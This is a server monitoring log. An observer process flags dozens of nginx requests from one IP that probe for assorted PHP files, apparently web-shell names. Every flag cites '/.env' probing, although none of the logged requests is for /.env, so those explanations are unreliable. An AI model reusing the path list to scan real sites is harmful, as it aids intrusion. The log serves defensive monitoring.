Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380960 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.616869750Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /155.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380987 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.686249756Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /mh.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381013 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.754257417Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /mh.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381038 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.821340330Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /222.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381063 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.889235566Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /222.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381089 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.956772713Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /hehe.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381114 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.025879310Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /hehe.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381139 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.098987174Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /tool.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381183 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.168043910Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /tool.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381207 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.235661022Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /wp-act.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381233 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.314107996Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /wp-act.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381259 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.400699793Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /cu.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381286 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.475663744Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /cu.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381327 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.542868210Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /fs.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381353 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.611347531Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /fs.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381378 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.679155554Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /asd.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381406 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.747734699Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /asd.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381432 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.819305049Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /ws80.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381458 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:33.886944908Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /ws80.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381491 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.961613098Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /ms.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381517 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.029571325Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ms.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381545 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.097480011Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /jga.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381572 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.167897421Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /jga.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381597 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.236178573Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /666.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381627 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.303823108Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /666.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381657 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.370878746Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /zc-104.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381686 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.438614913Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /zc-104.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381712 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.506519430Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws88.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381735 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:34.574135805Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws88.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381776 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.641390539Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws60.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381803 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:34.710591800Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws60.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381830 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.778692610Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /bo.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381855 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.850891505Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /bo.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381880 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.918107013Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws84.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381905 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:35.005786935Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /ws84.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381929 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.113954309Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /public/vx.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381955 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.186220758Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /public/vx.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381981 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.270141389Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /vanda.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382008 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.342329955Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /vanda.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382032 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.409542485Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /amp.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382058 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.477480105Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /amp.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382082 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.544879055Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /a4.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382106 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.615681121Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /a4.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382131 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.682880848Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /1.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382170 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.750997687Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /1.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382192 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.818431669Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /b.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382213 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.886933342Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /b.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.957824234Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /hots.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382283 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.025787821Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /hots.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382310 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.119051167Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /wp-the.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382336 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.195784053Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /wp-the.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382363 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.262824671Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /kj.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382390 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.337066278Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /kj.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.405767 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.404885551Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /a5.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.472953 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.472521764Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /a5.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.540070 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.539792822Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /44.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.607857 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.607624470Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /44.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.674960 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.674718241Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /public/ws49.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.742619 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.742366608Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /public/ws49.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.819367 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.819094984Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /xxw.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.887000 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.886767218Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /xxw.php HTTP/1.1" 200 1309 "-" "-" "-"
